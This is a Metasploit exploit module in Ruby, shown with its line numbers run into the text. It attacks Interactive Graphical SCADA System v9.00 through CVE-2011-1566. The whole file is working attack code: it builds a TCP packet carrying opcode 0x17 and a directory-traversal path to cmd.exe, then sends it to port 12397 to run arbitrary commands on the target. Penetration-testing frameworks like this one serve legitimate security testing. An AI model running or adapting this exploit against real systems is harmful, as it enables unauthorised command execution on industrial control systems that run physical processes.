Path: blob/master/modules/exploits/windows/scada/igss_exec_17.rb
19592 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Interactive Graphical SCADA System Remote Command Injection',15'Description' => %q{16This module abuses a directory traversal flaw in Interactive17Graphical SCADA System v9.00. In conjunction with the traversal18flaw, if opcode 0x17 is sent to the dc.exe process, an attacker19may be able to execute arbitrary system commands.20},21'Author' => [22'Luigi Auriemma',23'MC'24],25'License' => MSF_LICENSE,26'References' => [27[ 'CVE', '2011-1566'],28[ 'OSVDB', '72349'],29[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],30],31'Platform' => 'win',32'Arch' => ARCH_CMD,33'Payload' => {34'Space' => 153,35'DisableNops' => true36},37'Targets' => [38[ 'Windows', {} ]39],40'DefaultTarget' => 0,41'Privileged' => false,42'DisclosureDate' => '2011-03-21',43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)5051register_options(52[53Opt::RPORT(12397)54]55)56end5758def exploit59print_status("Sending exploit packet...")6061connect6263packet = [0x00000100].pack('V') + [0x00000000].pack('V')64packet << [0x00000100].pack('V') + [0x00000017].pack('V')65packet << [0x00000000].pack('V') + [0x00000000].pack('V')66packet << [0x00000000].pack('V') + [0x00000000].pack('V')67packet << [0x00000000].pack('V') + [0x00000000].pack('V')68packet << [0x00000000].pack('V')69packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"70packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"71packet << "\x00" * (143)7273sock.put(packet)74sock.get_once(-1, 0.5)75disconnect76end77end787980